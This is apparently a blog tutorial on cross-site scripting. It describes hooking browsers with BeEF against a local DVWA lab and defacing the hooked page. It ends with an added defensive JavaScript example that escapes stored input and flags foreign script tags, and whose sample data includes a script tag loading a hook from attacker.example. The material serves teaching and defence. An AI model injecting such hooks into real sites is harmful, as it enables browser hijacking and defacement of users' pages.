XSS CROSS SITE SCRIPTING
XSS is an attack that allows an attacker to edit or inject a script into a vulnerable web application. For details, you can read the XSS Cross Site Scripting Cheat Sheet. Cross-site scripting holes are web-application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern web browsers.
This attack lets the attacker act on the target system, for example key logging, defacement, etc. The types of XSS are persistent and non-persistent. For example, non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in, and a persistent cross-zone scripting vulnerability coupled with a computer worm allowed execution of arbitrary code and listing of filesystem contents via a QuickTime movie on MySpace (Wikipedia).
Practical XSS Scripting using the BeEF Framework.
In BackTrack there are two kinds of BeEF: BeEF and BeEF-Ng. At this stage I tried BeEF. Open BeEF and look at the script it loads. The hook web page loads beefmagic.js.php to open the connection with the target.
Figure: Run BeEF
Open it in the browser.
Figure: BeEF Web Page
After logging in, to check that BeEF is running normally, open the example hook in a new browser.
Figure: Example BeEF
The target and the attacker are now connected. The zombie 127.0.0.1 appears, using Firefox on a Linux operating system. The log summary shows the zombie target connected.
Figure: Get zombie
Try sending the deface page and look at the victim web page.
Figure: Deface Web Page
Next, I tried with DVWA: inject the hook script into the DVWA page. Once connected, try sending a pop-up message like this.
Figure: DVWA Pop Up Zombie
Figure: DVWA BeEF Infected
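A defender's view of the injection step above, as an added example that is not part of the original post: it encodes stored input before rendering and audits stored content for script tags loaded from origins outside an allowlist. The host names, sample comments and function names are constructed assumptions.

```javascript
// Added example, not code from the original post or from BeEF/DVWA.
// Hosts and stored comments are constructed sample data.
const PAGE_ORIGIN = 'http://dvwa.example';   // assumed origin of the protected site
const ALLOWED = [PAGE_ORIGIN];               // origins allowed to serve scripts

const storedComments = [
  'Nice post!',
  '<script src="http://attacker.example/beefmagic.js.php"></script>',
  '<SCRIPT SRC=/js/site.js></SCRIPT>',
];

// Encode the five HTML-significant characters so stored input renders as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Return the src of every <script> tag whose origin is not on the allowlist.
// Limitation: a regex scan, not a full HTML parser; inline scripts are skipped.
function findForeignScripts(html, pageOrigin, allowedOrigins) {
  const hits = [];
  const tagRe = /<script\b[^>]*>/gi;
  const srcRe = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  for (const tag of html.match(tagRe) || []) {
    const m = srcRe.exec(tag);
    if (!m) continue;
    const src = m[1] ?? m[2] ?? m[3];
    try {
      // Relative and protocol-relative URLs resolve against the page origin.
      const origin = new URL(src, pageOrigin).origin;
      if (!allowedOrigins.includes(origin)) hits.push(src);
    } catch {
      hits.push(src); // unparsable URL: report it for review
    }
  }
  return hits;
}

// Audit every stored comment and collect foreign script sources.
function auditStored(comments) {
  return comments.flatMap((c) => findForeignScripts(c, PAGE_ORIGIN, ALLOWED));
}

console.log('foreign scripts:', auditStored(storedComments));
console.log('rendered safely:', escapeHtml(storedComments[1]));
```

Encoding at output time is the fix; the audit only helps find hook tags already stored before the fix was deployed.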
Keep trying.